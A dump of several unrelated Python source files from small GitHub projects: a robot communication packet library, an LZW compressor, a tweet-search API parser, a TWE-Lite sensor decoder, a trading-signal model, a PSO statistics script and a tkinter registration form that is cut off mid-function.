str(pad_size) + \"x\"\n            cls.STRUCT = struct.Struct(fmt)\n\n        if cls.HANDLER_METHODS is None:\n            packet_method = \"on\"\n            for c in cls.__name__:\n                if c.isupper():\n                    packet_method += \"_\" + c.lower()\n                else:\n                    packet_method += c\n            cls.HANDLER_METHODS = [ packet_method, 'on_packet' ]\n\n    @property\n    def name(self):\n        return self.__class__.__name__\n\n\n    def __init__(self, *args, **kwargs):\n        values_iter = None\n        if len(args) != 0 and type(args[0]) != tuple:\n            values_iter = iter(args)\n        for name, item in 
self.DEFINITION:\n value = None\n if values_iter is None:\n for aname, avalue in args:\n if name == aname:\n value = avalue\n break\n else:\n try:\n value = next(values_iter)\n except StopIteration:\n values_iter = None\n if value is None:\n if name in kwargs:\n value = kwargs[name]\n else:\n # Call the constructor of the value to duplicate it. This is necessary for lists\n value = copy.deepcopy(item.default_value)\n setattr(self, name, value)\n\n\n def serialize(self):\n args = [ self.TYPE ]\n self.BIN_STRUCT.serialize(self, args)\n try :\n return self.STRUCT.pack(*args)\n except Exception as e :\n raise Exception(\"Error while serializing packet of type {} : {}\".format(self.name, e))\n\n\n def deserialize(self, buf):\n unpacked = self.STRUCT.unpack(buf)\n it = iter(unpacked)\n # pop the type\n next(it)\n self.BIN_STRUCT.deserialize_to(self, it)\n\n\n def serialize_as_text(self):\n return self.name + self.BIN_STRUCT.serialize_as_text(self)\n\n\n def to_dump(self):\n return self.BIN_STRUCT.to_dump(self)\n\n\n def dispatch_generator(self, obj):\n for method in self.HANDLER_METHODS:\n if hasattr(obj, method):\n g = getattr(obj, method)(self)\n if isinstance(g, types.GeneratorType):\n yield from g\n\n\n def dispatch(self, obj):\n for method in self.HANDLER_METHODS:\n if hasattr(obj, method):\n getattr(obj, method)(self)\n\n\n################################################################################\n# Packet type ranges\n\nCOLORDET_RANGE_START = 1\nCOLORDET_RANGE_END = 32\nTURRET_RANGE_START = COLORDET_RANGE_END\nTURRET_RANGE_END = 50\nPIC32_RANGE_START = TURRET_RANGE_END\nPIC32_RANGE_END = 150\nSIMULATOR_RANGE_START = PIC32_RANGE_END\nSIMULATOR_RANGE_END = 200\nINTERBOT_RANGE_START = SIMULATOR_RANGE_END\nINTERBOT_RANGE_END = 230\nINTERNAL_RANGE_START = INTERBOT_RANGE_END\nINTERNAL_RANGE_END = 256\n\n################################################################################\n# Packet classes\n\n\n# Process packets\n\n\nclass DisableScan(BasePacket):\n\n TYPE = 1\n\n\n\n\nclass SetLogPrefix(BasePacket):\n\n TYPE = 2\n DEFINITION = (\n ('prefix', String(128)),\n )\n\n\n\n\nclass ColorDetected(BasePacket):\n\n TYPE = 3\n DEFINITION = (\n ('color' , UEnum8(COLOR, COLOR_NONE)),\n )\n\n\nclass EnableScan(BasePacket):\n\n TYPE = 4\n\n\n\n# Turret packets\n\n\nclass TurretDetect(BasePacket):\n\n MAX_SIZE = 4\n TYPE = 32\n DEFINITION = (\n ('distance', UEnum8(OPPONENT_DISTANCE, OPPONENT_DISTANCE_NEAR)),\n ('angle' , UInt8 (0, \"Detection angle index (0 <= angle <= 17; 20 deg resolution)\")),\n ('robot' , UEnum8(OPPONENT_ROBOT, OPPONENT_ROBOT_MAIN)),\n )\n\n\n\n\nclass TurretInit(BasePacket):\n\n MAX_SIZE = 4\n TYPE = 33\n DEFINITION = (\n ('mode' , UEnum8(TURRET_INIT_MODE, TURRET_INIT_MODE_READ)),\n ('short_distance', UInt8 (0, \"Short distance detection range\")),\n ('long_distance' , UInt8 (0, \"Long distance detection range\")),\n )\n\n\n\n\nclass TurretDistances(BasePacket):\n\n MAX_SIZE = 3\n TYPE = 34\n DEFINITION = (\n ('short_distance', UInt8 (0, \"Short distance detection range\")),\n ('long_distance' , UInt8 (0, \"Long distance detection range\")),\n )\n\n\n\n\nclass TurretBoot(BasePacket):\n\n MAX_SIZE = 1\n TYPE = 35\n\n\n# PIC 32 packets\n\n\nclass Reinitialize(BasePacket):\n\n TYPE = 50\n\n\n\n\nclass ControllerReady(BasePacket):\n\n TYPE = 51\n LOGVIEW_DEFAULT_ENABLED = True\n\n\n\n\nclass DeviceBusy(BasePacket):\n\n TYPE = 52\n DEFINITION = (\n ('remote_device', UEnum8(REMOTE_DEVICE, REMOTE_DEVICE_PIC)),\n )\n\n\n\n\nclass DeviceReady(BasePacket):\n\n TYPE = 53\n 
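# Round-trip sketch (comment only; assumes the BasePacket machinery above):\n    #   pkt = DeviceReady(team=TEAM_UNKNOWN, remote_device=REMOTE_DEVICE_PIC)\n    #   raw = pkt.serialize()            # fixed-size buffer, padded to MAX_SIZE\n    #   pkt2 = DeviceReady(); pkt2.deserialize(raw)\n    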
DEFINITION = (\n ('team', UEnum8(TEAM , TEAM_UNKNOWN )),\n ('remote_device', UEnum8(REMOTE_DEVICE, REMOTE_DEVICE_PIC)),\n )\n\n\n\n\nclass Start(BasePacket):\n\n TYPE = 54\n DEFINITION = (\n ('team', UEnum8(TEAM, TEAM_UNKNOWN)),\n )\n\n\n\n\nclass Rotate(BasePacket):\n\n TYPE = 55\n DEFINITION = (\n ('direction', Enum8(DIRECTION, DIRECTION_AUTO)),\n ('angle' , Float(0.0, \"Destination angle\")),\n )\n\n\n\n\nclass MoveCurve(BasePacket):\n\n TYPE = 56\n DEFINITION = (\n ('direction', Enum8 (DIRECTION, DIRECTION_FORWARD)),\n ('angle' , OptionalAngle(None, \"Destination angle\")),\n ('points' , List (62, Point(), [], \"List of points to follow\")),\n )\n\n\n\n\nclass MoveLine(BasePacket):\n\n TYPE = 57\n DEFINITION = (\n ('direction', Enum8(DIRECTION, DIRECTION_FORWARD)),\n ('points' , List (63, Point(), [], \"List of points to follow\")),\n )\n\n\n\n\nclass MoveArc(BasePacket):\n\n TYPE = 58\n DEFINITION = (\n ('direction', Enum8(DIRECTION, DIRECTION_FORWARD)),\n ('center' , Point()),\n ('radius' , Float(0.0, \"Arc radius\")),\n ('points' , List (61, Float(0.0), [], \"List of points to follow\")),\n )\n\n\n\n\nclass GotoStarted(BasePacket):\n\n TYPE = 59\n\n\n\n\nclass WaypointReached(BasePacket):\n\n TYPE = 60\n\n DEFINITION = (\n ('current_point_index', UInt8(0, \"Reached waypoint index\")),\n ('current_pose' , Pose (\"Current robot pose\")),\n )\n\n\n\n\nclass GotoFinished(BasePacket):\n\n TYPE = 61\n DEFINITION = (\n ('reason' , UEnum8(REASON, REASON_DESTINATION_REACHED)),\n ('current_pose' , Pose (\"Robot pose at the end of the movement\")),\n ('current_point_index', UInt8 (0, \"Last reached point index of the point list given in the Goto packet\")),\n )\n\n\n\n\nclass EnableAntiBlocking(BasePacket):\n\n TYPE = 62\n\n\n\n\nclass DisableAntiBlocking(BasePacket):\n\n TYPE = 63\n\n\n\n\nclass KeepAlive(BasePacket):\n\n TYPE = 64\n LOGVIEW_DEFAULT_ENABLED = False\n DEFINITION = (\n ('current_pose' , Pose (\"Current robot pose\")),\n ('match_started', Bool (False, \"Flag defining if the match has already started\")),\n ('match_time' , UInt32(0, \"Time elapsed since the start of the match\")),\n )\n\n\n\n\nclass PositionControlConfig(BasePacket):\n\n TYPE = 65\n DEFINITION = (\n ('ratio_acc' , Float(0.0)),\n ('ratio_decc' , Float(0.0)),\n ('ratio_acc_rot' , Float(0.0)),\n ('ratio_decc_rot', Float(0.0)),\n ('vmax_limit' , Float(0.0)),\n )\n\n\n\n\nclass Stop(BasePacket):\n\n TYPE = 66\n\n\n\n\nclass Resettle(BasePacket):\n\n TYPE = 67\n DEFINITION = (\n ('axis' , UEnum8 (AXIS, AXIS_X)),\n ('position', Float (0.0, \"Robot position on the given axis\")),\n ('angle' , FloatRadian(0.0, \"Robot angle\")),\n )\n\n\n\n\nclass StopAll(BasePacket):\n\n TYPE = 68\n\n\n\n\nclass ServoControl(BasePacket):\n\n TYPE = 69\n DEFINITION = (\n ('type', UEnum8(ACTUATOR_TYPE, ACTUATOR_TYPE_SERVO_AX)),\n ('id', UInt8 (0, \"Servo identifier\")),\n ('command', UEnum8(SERVO_COMMAND, SERVO_COMMAND_MOVE)),\n ('value', UInt16(0, \"Destination angle [0, 300]\")),\n ('timeout', UInt32(0, \"Timeout in ms\")),\n ('status', UEnum8(SERVO_STATUS, SERVO_STATUS_TIMED_OUT)),\n )\n\n\n\n\nclass RelayControl(BasePacket):\n\n TYPE = 70\n DEFINITION = (\n ('id', UInt8 (0, \"Relay identifier\")),\n ('action', UEnum8(ACTION, ACTION_OFF)),\n )\n\n\n\n\nclass PwmControl(BasePacket):\n\n TYPE = 71\n DEFINITION = (\n ('id', UInt8 (0, \"PWM identifier\")),\n ('value', UInt16(0, \"Value [0x0 - 0x3FF - 0x7FF]\")),\n )\n\n\n\n\nclass RobotInit(BasePacket):\n\n TYPE = 72\n\n\n# Simulator\n\n\nclass SimulatorData(BasePacket):\n\n TYPE = 150\n 
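# Editor's note (derived from the range constants above): TYPE = 150 equals SIMULATOR_RANGE_START, so this and the following simulator packets occupy the [150, 200) slice of the one-byte packet type space.\n    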
LOGVIEW_DEFAULT_ENABLED = False\n DEFINITION = (\n ('leds', UInt8(0, \"Dockstar leds status\")),\n )\n\n\n\n\nclass SimulatorClearGraphMapZones(BasePacket):\n\n TYPE = 151\n LOGVIEW_DEFAULT_ENABLED = False\n\n\n\n\nclass SimulatorAddGraphMapZone(BasePacket):\n\n TYPE = 152\n LOGVIEW_DEFAULT_ENABLED = False\n DEFINITION = (\n ('id' , UInt8(0, \"Zone id\")),\n ('points', List (63, Float(0.0), [], \"Points\")),\n )\n\n\n\n\nclass SimulatorEnableGraphMapZone(BasePacket):\n\n TYPE = 153\n LOGVIEW_DEFAULT_ENABLED = False\n DEFINITION = (\n ('id' , UInt8(0, \"Zone id\")),\n ('enabled', Bool (True, \"Zone status\")),\n )\n\n\n\nclass SimulatorMoveGraphMapZone(BasePacket):\n\n TYPE = 154\n LOGVIEW_DEFAULT_ENABLED = False\n DEFINITION = (\n ('id' , UInt8(0, \"Zone id\")),\n ('dx' , Float(0.0, \"X coordinate\")),\n ('dy' , Float(0.0, \"Y coordinate\")),\n )\n\n\n\n\nclass SimulatorClearGraphMapEdges(BasePacket):\n\n TYPE = 155\n LOGVIEW_DEFAULT_ENABLED = False\n\n\n\n\nclass SimulatorGraphMapEdges(BasePacket):\n\n TYPE = 156\n LOGVIEW_DEFAULT_ENABLED = False\n DEFINITION = (\n ('points', List(63, Float(0.0), [], \"Edges\")),\n )\n\n\n\n\nclass SimulatorGraphMapRoute(BasePacket):\n\n TYPE = 157\n LOGVIEW_DEFAULT_ENABLED = False\n DEFINITION = (\n ('points', List(63, Float(0.0), [], \"Edges\")),\n )\n\n\n# Interbot\n\n\nclass InterbotPosition(BasePacket):\n\n TYPE = 201\n\n DEFINITION = (\n ('pose', Pose(\"Other robot pose\")),\n ('is_moving', Bool(False, \"Is the robot moving or not\")),\n ('destination', Pose(\"Other robot destination\")),\n )\n\n\n\n\nclass InterbotGoalStatus(BasePacket):\n\n TYPE = 202\n\n DEFINITION = (\n ('goal_identifier', String(32, \"\", \"Goal identifier\")),\n ('goal_status' , UInt8 (0, \"Goal status\")),\n )\n\n\nclass InterbotGeneric(BasePacket):\n\n TYPE = 203\n\n DEFINITION = (\n ('data', String(255, \"\", \"Data\")),\n )\n\n\n# Internal\n\n\nclass InterbotConnected(BasePacket):\n\n TYPE = 230\n\n\n\n\nclass InterbotDisconnected(BasePacket):\n\n TYPE = 231\n\n\n\n\nclass OpponentPosition(BasePacket):\n\n TYPE = 232\n\n DEFINITION = (\n ('robot' , UEnum8(OPPONENT_ROBOT, OPPONENT_ROBOT_MAIN)),\n ('distance' , UEnum8(OPPONENT_DISTANCE, OPPONENT_DISTANCE_NEAR)),\n ('x' , Float(0.0, \"Opponent estimated X coordinate\")),\n ('y' , Float(0.0, \"Opponent estimated Y coordinate\")),\n )\n\n\n\n\nclass OpponentDetected(BasePacket):\n\n TYPE = 233\n\n DEFINITION = (\n ('robot' , UEnum8(OPPONENT_ROBOT, OPPONENT_ROBOT_MAIN)),\n ('direction', UEnum8(DIRECTION, DIRECTION_FORWARD)),\n ('x' , Float(0.0, \"Opponent estimated X coordinate\")),\n ('y' , Float(0.0, \"Opponent estimated Y coordinate\")),\n )\n\n\n\n\nclass OpponentDisappeared(BasePacket):\n\n TYPE = 234\n\n DEFINITION = (\n ('robot' , UEnum8(OPPONENT_ROBOT, OPPONENT_ROBOT_MAIN)),\n ('direction', UEnum8(DIRECTION, DIRECTION_FORWARD)),\n )\n\n\n\n\nclass RelayToggle(BasePacket):\n\n TYPE = 235\n\n DEFINITION = (\n ('id' , UInt8 (0, \"Relay ID\")),\n ('action' , UEnum8(ACTION, ACTION_OFF)),\n ('toggle_count', Int8 (0, \"Number of toggles before 'action'. 
0 = release\")),\n )\n\n\n################################################################################\n# Packets lookup setup\n\n\nPACKETS_BY_NAME = {}\nPACKETS_BY_TYPE = {}\nPACKETS_LIST = []\n\n\nfor (item_name, item_type) in inspect.getmembers(sys.modules[__name__]):\n if inspect.isclass(item_type) and issubclass(item_type, BasePacket) and item_type != BasePacket:\n # Create a packet instance a first time to finish the setup\n item_type.static_init()\n assert item_name not in PACKETS_BY_NAME\n PACKETS_BY_NAME[item_name] = item_type\n assert item_type.TYPE not in PACKETS_BY_TYPE\n PACKETS_BY_TYPE[item_type.TYPE] = item_type\n PACKETS_LIST = list(PACKETS_BY_TYPE.values())\n\n\ndef create_packet(buffer):\n # TODO : when unknown packet, return a dummy class\n (packet_type,) = struct.unpack(\" None:\n \"\"\"Initialize LZW object.\n\n Args:\n raw_data (str): Raw data to compress.\n compressed_data (bytes): Compressed data to decompress.\n \"\"\"\n self.raw_data: str = raw_data\n self.raw_data_bytes: bytes = raw_data.encode(\"utf-8\")\n self.compressed_data: bytes = compressed_data\n\n def compress(self) -> bytes:\n \"\"\"Compress raw data.\n\n Returns:\n bytes: Compressed data.\n \"\"\"\n compressed = []\n start_dictionary = list(set(self.raw_data_bytes))\n dictionary: list[list[int]] = [[i] for i in start_dictionary]\n i = 0\n while i < len(self.raw_data_bytes):\n prefix_id = self.find_longest_prefix(\n dictionary,\n (self.raw_data_bytes[j] for j in range(i, len(self.raw_data_bytes))),\n )\n if prefix_id == -1:\n break\n prefix = dictionary[prefix_id]\n compressed.append(prefix_id)\n i += len(prefix)\n if i < len(self.raw_data_bytes):\n dictionary.append(prefix + [self.raw_data_bytes[i]])\n\n start_dict_bytes = bytes(start_dictionary)\n compressed_bytes = b\"\"\n for i in compressed:\n compressed_bytes += struct.pack(\">I\", i)\n start_dict_header = struct.pack(\"I\", len(start_dict_bytes))\n compressed_header = struct.pack(\"I\", len(compressed_bytes))\n return (\n start_dict_header + start_dict_bytes + compressed_header + compressed_bytes\n )\n\n def find_longest_prefix(\n self, dictionary: list[list[int]], sequence: Iterable[int]\n ) -> int:\n \"\"\"Find longest prefix in dictionary.\n\n Args:\n dictionary (list[list[int]]): Dictionary to search in.\n sequence (Iterable[int]): Sequence to search for.\n\n Returns:\n int: Index of longest prefix in dictionary.\n \"\"\"\n prefix = []\n for char in sequence:\n prefix += [char]\n if prefix in dictionary:\n continue\n return dictionary.index(prefix[:-1])\n return dictionary.index(prefix)\n\n def compress_and_set(self) -> None:\n \"\"\"Compress raw data and set compressed data.\"\"\"\n self.compressed_data = self.compress()\n\n def save_compressed(self, path: str) -> None:\n \"\"\"Save compressed data to file.\n\n Args:\n path (str): Path to file.\n \"\"\"\n with open(path, \"wb\") as file:\n file.write(self.compressed_data)\n\n def load_compressed(self, path: str) -> None:\n \"\"\"Load compressed data from file.\n\n Args:\n path (str): Path to file.\n \"\"\"\n with open(path, \"rb\") as file:\n self.compressed_data = file.read()\n\n def decompress(self) -> str:\n \"\"\"Decompress compressed data.\n\n Returns:\n str: Decompressed data.\n \"\"\"\n start_dict_size = struct.unpack(\"I\", self.compressed_data[:4])[0]\n start_dict = self.compressed_data[4 : 4 + start_dict_size]\n compressed_size = struct.unpack(\n \"I\", self.compressed_data[4 + start_dict_size : 8 + start_dict_size]\n )[0]\n compressed = []\n for i in range(8 + start_dict_size, 
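# Editor's note (container layout recap from compress() above): [4-byte dict length][raw start dictionary][4-byte payload length][big-endian uint32 code stream]; this loop walks the code stream four bytes at a time:\n                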
8 + start_dict_size + compressed_size, 4):\n compressed.append(struct.unpack(\">I\", self.compressed_data[i : i + 4])[0])\n dictionary = [[i] for i in start_dict]\n decompressed = []\n prev_i = compressed[0]\n decompressed += dictionary[prev_i]\n for i in compressed[1:]:\n if i < len(dictionary):\n dictionary.append(dictionary[prev_i] + [dictionary[i][0]])\n decompressed += dictionary[i]\n else:\n dictionary.append(dictionary[prev_i] + [dictionary[prev_i][0]])\n decompressed += dictionary[-1]\n prev_i = i\n return bytes(decompressed).decode(\"utf-8\")\n\n def decompress_and_set(self) -> None:\n \"\"\"Decompress compressed data and set raw data.\"\"\"\n self.raw_data = self.decompress()\n\n def save_decompressed(self, path: str) -> None:\n \"\"\"Save decompressed data to file.\n\n Args:\n path (str): Path to file.\n \"\"\"\n with open(path, \"w\", encoding=\"utf-8\") as file:\n file.write(self.raw_data)\n\n def load_raw(self, path: str) -> None:\n \"\"\"Load raw data from file.\n\n Args:\n path (str): Path to file.\n \"\"\"\n with open(path, \"r\", encoding=\"utf-8\") as file:\n self.raw_data = file.read()\n self.raw_data_bytes = self.raw_data.encode(\"utf-8\")\n","repo_name":"rhusiev-student/s2_disc_l2","sub_path":"src/lzw.py","file_name":"lzw.py","file_ext":"py","file_size_in_byte":5081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74063602729","text":"from flask_restx import reqparse\n\ntwint_argument_parser = reqparse.RequestParser()\n\ntwint_argument_parser.add_argument(\n 'username',\n location='args',\n type=str,\n required=False,\n default=None,\n help='The username to make the tweets search')\n\ntwint_argument_parser.add_argument('keyword',\n location='args',\n type=str,\n required=False,\n default=None,\n help='The keyword to make tweets search')\n\ntwint_argument_parser.add_argument(\n 'limit',\n location='args',\n type=int,\n required=False,\n default=20,\n help='Number of Tweets to pull (Increments of 20)..')\ntwint_argument_parser.add_argument('likes',\n location='args',\n type=int,\n required=False,\n default=50,\n help='Number of Minimum likes ')\ntwint_argument_parser.add_argument(\n 'lang',\n location='args',\n type=str,\n required=True,\n default=None,\n help=\n \"Language of the tweet to retrieve. The language must be ISO coded. For example, English code would be 'en'.\"\n)\ntwint_argument_parser.add_argument(\n 'from_date',\n location='args',\n type=str,\n required=False,\n default=None,\n help=\n 'The start date to retrieve tweets from. The date must be in ISO 8601 format YYYY-mm-dd.'\n)\n\ntwint_argument_parser.add_argument(\n 'to_date',\n location='args',\n type=str,\n required=False,\n default=None,\n help=\n 'The end date to retrieve tweets from. 
The date must be in ISO 8601 format YYYY-mm-dd.'\n)","repo_name":"tobeal/pruebasTwint","sub_path":"twin/twinApi/api/twint_parsers.py","file_name":"twint_parsers.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21782768591","text":"#!/usr/bin/env python3\n# -*- mode:python; coding:utf-8 -*-\n\nimport time\nfrom datetime import datetime,timedelta\nimport syslog\nimport sys\nimport os\nimport serial\nimport struct\nimport binascii\nimport glob\nimport platform\nimport argparse\n\ndef decodeVolt(batt):\n volt = 0\n if batt <= 170:\n volt = 1950 + 5 * batt\n else:\n volt = 2800 + 10 * (batt - 170)\n return volt\n\n# Decode output of vSerOutput_Uart().\ndef parseTWELite(raw):\n if raw[0] != \":\":\n return {}\n data = binascii.unhexlify(raw[1:])\n pkt = raw[25:27]\n result = None\n\n if pkt == '10':\n # relay,LQI,FRAME,src,u8id,u8pkt,batt,adc1,adc2,PC1,PC2,CRC\n ss10 = struct.Struct(\">IBHIBBBHHHHB\")\n parsed = ss10.unpack(data)\n\n volt = decodeVolt(parsed[6])\n\n result = {\n \"relay\" : \"{0:08X}\".format(parsed[0]),\n \"lqi\" : parsed[1],\n \"frame\" : parsed[2],\n \"from\" : \"{0:08X}\".format(parsed[3]),\n \"id\": parsed[4],\n \"pkt\": parsed[5],\n \"volt\": volt,\n \"vc2\" : 2 * parsed[7],\n \"adc2\" : parsed[8],\n \"PC1\" : parsed[9],\n \"PC2\" : parsed[10]\n }\n elif pkt == 'FE':\n # relay,LQI,FRAME,src,u8id,u8pkt,batt,adc1,adc2,param,DIbitmap,CRC\n ssFE = struct.Struct(\">IBHIBBBHHBBB\")\n parsed = ssFE.unpack(data)\n\n volt = decodeVolt(parsed[6])\n\n result = {\n \"relay\" : \"{0:08X}\".format(parsed[0]),\n \"lqi\" : parsed[1],\n \"frame\" : parsed[2],\n \"from\" : \"{0:08X}\".format(parsed[3]),\n \"id\": parsed[4],\n \"pkt\": parsed[5],\n \"volt\": volt,\n \"vc2\" : 2 * parsed[7],\n \"adc2\" : parsed[8],\n \"param\" : parsed[9],\n \"button\" : parsed[10]\n }\n return result\n\ndef showParsm(filename, param):\n f = open(filename, \"r\")\n rx = f.readline()\n f.close()\n parsed = parseTWELite(rx)\n if param in parsed:\n print(parsed[param])\n else:\n print ('-2')\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Show some values collected by TWE-Lite.\")\n parser.add_argument('-d', '--directory', nargs='?', default='/var/run/twe', help='Directory of stattus cache.')\n parser.add_argument('params', nargs=2)\n args = parser.parse_args()\n for p in args.params:\n if ':' in p:\n (name, param) = p.split(':', 2)\n filename = args.directory + os.sep + name\n if os.path.exists(filename):\n showParsm(filename, param)\n else:\n print ('-1')\n else:\n print ('-0')\n\n print(\"\\n\" + platform.system())\n sys.exit(0)\n","repo_name":"true-nature/App_DoorChecker","sub_path":"RaspberryPi/usr/local/bin/twe-show.py","file_name":"twe-show.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30820560610","text":"import pandas as pd\n\nclass Model:\n def __init__(self, name, input_checker, buy_signal, sell_signal, rows_needed, span):\n '''\n input_checker takes a dataframe representing the available data, \n and returns true if the data is the correct shape/size, false otherwise\n buy_signal takes a df and returns true if the model says to buy\n sell_signal also takes a df, but returns true if the model says to sell\n '''\n self.name = name\n self.check_input = input_checker\n self.buy_signal = buy_signal\n self.sell_signal = sell_signal\n self.rows_needed = 
rows_needed\n        self.span = span\n\n\nclass Mean_Reversion(Model):\n    def __init__(self, name, n_for_long_ma, n_for_short_ma, n_for_RSI, span='year'):\n        '''\n        Implements a mean reversion strategy.\n        Says buy if 1) price is above the long-period MA and 2) the short-period RSI is below 10.\n        Says sell if price falls below the short-period MA.\n        '''\n        self.name = name\n        self.n_long_ma = n_for_long_ma\n        self.n_short_ma = n_for_short_ma\n        self.n_RSI = n_for_RSI\n        self.expected_columns = [str(self.n_long_ma)+'_period_ma', str(self.n_short_ma)+'_period_ma', str(self.n_RSI)+'_period_RSI']\n        self.rows_needed = 2\n        self.span = span\n\n        def check_input(df):\n            cols = df.columns\n            for e in self.expected_columns:\n                if e not in cols: return False\n            return True\n\n        def buy_signal(df):\n            last_row = df.iloc[-1]\n            condition1 = float(last_row['close_price']) > float(last_row[self.expected_columns[0]])\n            # ^price above the long MA\n            condition2 = float(last_row[self.expected_columns[2]]) < 10\n            # ^RSI below the trigger level (10)\n            return condition1 and condition2\n\n        def sell_signal(df):\n            last_row = df.iloc[-1]\n            return float(last_row['close_price']) < float(last_row[self.expected_columns[1]])\n\n        self.check_input = check_input\n        self.buy_signal = buy_signal\n        self.sell_signal = sell_signal\n\n    def save(self):\n        return\n","repo_name":"rabisnath/birdwatching","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"39066416666","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom function_list import *\nfrom scipy.stats import ttest_ind\nimport re\n\nfuncs = ['RosenBrock', 'Rastrigin']\n\nfor func in funcs:\n    print(\"********************************************\")\n    print(\"func = {} \". 
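# Editor's note: for each swarm size N this script regex-extracts the dash-delimited result value from the ring- and star-topology logs and compares the two samples with an independent two-sample t-test (scipy.stats.ttest_ind).\n          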
format(func))\n for N in [128, 256, 512, 1024, 2048]:\n print(\"_____________________________________________\")\n res_star = []\n res_ring = []\n\n link_1 = 'log/ring/' + func + '_' + str(N) + '.txt'\n link_2 = 'log/star/' + func + '_' + str(N) + '.txt'\n with open(link_1, 'r') as fi:\n for line in fi:\n m = re.search(r'(?<= - )(.*?)(?= - )',line)\n if m != None:\n res_ring.append(float(m.group(0)))\n print(\" res_ring = {}\".format(res_ring))\n print (\" \")\n with open(link_2, 'r') as fi:\n for line in fi:\n m = re.search(r'(?<= - )(.*?)(?= - )',line)\n if m != None:\n res_star.append(float(m.group(0)))\n print(\" res_start = {}\".format(res_star))\n print (\" \")\n print(\" N = {} - ttest {} \".format(N, ttest_ind(res_ring, res_star)))\n print (\" \")\n","repo_name":"PhamLeQuangNhat/Genetic_Algorithm_Learning_Projects","sub_path":"PSO/ttest.py","file_name":"ttest.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2187038574","text":"def backtracking(l, idx, tmp, order):\n if len(tmp) == l:\n order.append(list(map(int, tmp)))\n return\n \n for i in range(l):\n if str(i) not in tmp:\n backtracking(l, i+1, tmp+str(i), order)\n\n\ndef solution(k, dungeons):\n answer = 0\n order = []\n \n dungeons = sorted(dungeons, key=lambda x: (x[0], x[1]), reverse=True)\n \n backtracking(len(dungeons), 0, \"\", order)\n \n for i in range(len(order)):\n now = k\n tmp = 0\n for j in range(len(order[i])):\n x = order[i][j]\n \n if now >= dungeons[x][0]:\n now -= dungeons[x][1]\n tmp += 1\n \n answer = max(answer, tmp)\n if answer == len(order[i]):\n break\n \n return answer","repo_name":"rloldl-c/algorithm","sub_path":"프로그래머스/lv2/87946. 피로도/피로도.py","file_name":"피로도.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27672370262","text":"from tkinter import *\nfrom openpyxl import *\nfrom tkinter import messagebox\nfrom xlrd import *\n# import setuptools\n# import distutils\n# import site\n\nworksheet=load_workbook('F:\\workspace_python\\Geeks For Geeks\\excel1.xlsx')\nsheet=worksheet.active\n\ndef clear():\n name_field.delete(0,END)\n guardian_field.delete(0,END)\n join_date_field.delete(0,END)\n end_date_field.delete(0,END)\n contact_field.delete(0,END)\n address_field.delete(0,END)\n age_field.delete(0,END)\n\n\ndef insert():\n if ( name_field.get()==\"\" or \n guardian_field.get()==\"\" or \n join_date_field.get()==\"\" or \n end_date_field.get()==\"\" or \n contact_field.get()==\"\" or \n address_field==\"\" or \n age_field.get()==\"\" ) :\n print(\"Enter valid details\")\n messagebox.showinfo(\"information\",\"Enter all the details\")\n\n else:\n current_row=sheet.max_row\n current_column=sheet.max_column\n\n sheet.cell(row=current_row+1,column=1).value=name_field.get()\n sheet.cell(row=current_row+1,column=2).value=guardian_field.get()\n sheet.cell(row=current_row+1,column=3).value=join_date_field.get()\n sheet.cell(row=current_row+1,column=4).value=end_date_field.get()\n sheet.cell(row=current_row+1,column=5).value=contact_field.get()\n sheet.cell(row=current_row+1,column=6).value=address_field.get()\n sheet.cell(row=current_row+1,column=7).value=age_field.get()\n if radio_value.get()==1:\n sheet.cell(row=current_row+1,column=8).value=\"1 month\"\n elif radio_value.get()==2:\n sheet.cell(row=current_row+1,column=8).value=\"3 month\"\n elif radio_value.get()==3:\n 
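# Editor's note: radio_value 1/2/3 select \"1 month\"/\"3 month\"/\"6 month\"; any other value falls through to \"12 months\" in the else branch below.\n            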
sheet.cell(row=current_row+1,column=8).value=\"6 month\"\n else:\n sheet.cell(row=current_row+1,column=8).value=\"12 months\"\n \n worksheet.save('F:\\workspace_python\\Geeks For Geeks\\excel1.xlsx')\n\n name_field.focus_set()\n\n clear()\n\n\ndef show():\n \n #new window class declaration\n check_class=Tk()\n check_class.geometry(\"400x400\")\n status_var=StringVar()\n\n check_label1=Label(check_class,text=\"Details\",font=\"Aerial 15 underline\")\n check_label1.grid(row=0,column=1)\n\n search_field=Entry(check_class)\n\n # status_label=Label(check_class,textvariable=search_field.get())\n \n \n # book=open_workbook('F:\\workspace_python\\Geeks For Geeks\\excel1.xlsx')\n \n # for i in book.sheets:\n # for rowidx in range(i.nrows):\n # row\n \ndef excel():\n sheet.column_dimensions['A'].width = 20\n sheet.column_dimensions['B'].width = 20\n sheet.column_dimensions['C'].width = 20\n sheet.column_dimensions['D'].width = 20\n sheet.column_dimensions['E'].width = 20\n sheet.column_dimensions['F'].width = 40\n sheet.column_dimensions['G'].width = 10\n sheet.column_dimensions['H'].width = 10\n\n sheet.cell(row=1,column=1).value=\"Name\"\n sheet.cell(row=1,column=2).value=\"Guardian\"\n sheet.cell(row=1,column=3).value=\"join_date\"\n sheet.cell(row=1,column=4).value=\"end_date\"\n sheet.cell(row=1,column=5).value=\"contact\"\n sheet.cell(row=1,column=6).value=\"address\"\n sheet.cell(row=1,column=7).value=\"age\"\n sheet.cell(row=1,column=8).value=\"time\"\n\ndef focus2(Event):\n guardian_field.focus_set()\ndef focus3(Event):\n join_date_field.focus_set()\ndef focus4(Event):\n end_date_field.focus_set()\ndef focus5(Event):\n contact_field.focus_set()\ndef focus6(Event):\n address_field.focus_set()\ndef focus7(Event):\n age_field.focus_set()\n\n\nif __name__ == \"__main__\":\n \n main_class=Tk()\n main_class.title(\"Planet-X Registration form\")\n main_class.geometry(\"600x400\")\n radio_value=IntVar()\n 